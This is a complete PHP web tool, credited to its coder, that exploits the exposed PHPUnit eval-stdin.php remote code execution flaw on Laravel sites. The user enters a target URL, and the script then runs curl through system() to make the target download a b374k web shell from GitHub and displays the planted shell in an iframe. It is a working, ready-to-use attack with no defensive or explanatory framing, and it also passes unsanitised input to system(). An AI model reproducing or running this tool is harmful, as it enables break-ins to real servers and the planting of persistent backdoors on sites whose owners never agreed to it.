Laravel PHPUnit RCE [Web Based]

1. <?php
2.  
3.  
4. $shellname = $_POST['shellname'];
5. $url = $_POST['url'];
6. $foundfile = $url."/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php";
7. $shellfound = $url."/vendor/phpunit/phpunit/src/Util/PHP/".$shellname;
8. $actual_link = $_SERVER["HTTP_HOST"];
9.  
10.  
11.  
12. echo '
13. <!DOCTYPE html>
14. <html>
15. <head>
16. <title> API V3 PHPUNIT </title>
17. </head>
18. <body style="background-color: rgb(55,55,55);">
19. <center>
20. <pre style="color:white;">
21.  
22. _____ _ _ _____ _ _ _ _ _____ _______
23. | __ \| | | | __ \| | | | \ | |_ _|__ __|
24. | |__) | |__| | |__) | | | | \| | | | | |
25. | ___/| __ | ___/| | | | . ` | | | | |
26. | | | | | | | | |__| | |\ |_| |_ | |
27. |_| |_| |_|_| \____/|_| \_|_____| |_|
28.  
29.  
30. </pre>
31. <form method="POST">
32. <p style="color:white;">URL:</p><input type="text" name="url">
33. <br>
34. <p style="color:white;">Shell Name(exemple: shell.php ):</p><input type="text" name="shellname">
35. <br>
36. <button type="Submit" name="AutoShell">Auto shell</button>
37. <br>
38. <p style="color:red;">Coded by Yagamii | Version: 3.0</p>
39. <br>
40. <br>
41.  
42.  
43. </form>
44. </center>';
45.  
46.  
47. if(isset($_POST['AutoShell']))
48. {
49.  
50. system("curl --data \"<?system('wget https://raw.githubusercontent.com/JohnTroony/php-webshells/master/b374k-mini-shell-php.php.php -O ".$shellname."');?>\" -X GET ".$url."/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php");
51.  
52. echo '<iframe style="height: 1000px; width: 1550px;" src="'.$url."/vendor/phpunit/phpunit/src/Util/PHP/".$shellname.'"></iframe>';
53.  
54. }
55.  
56.  
57. ?>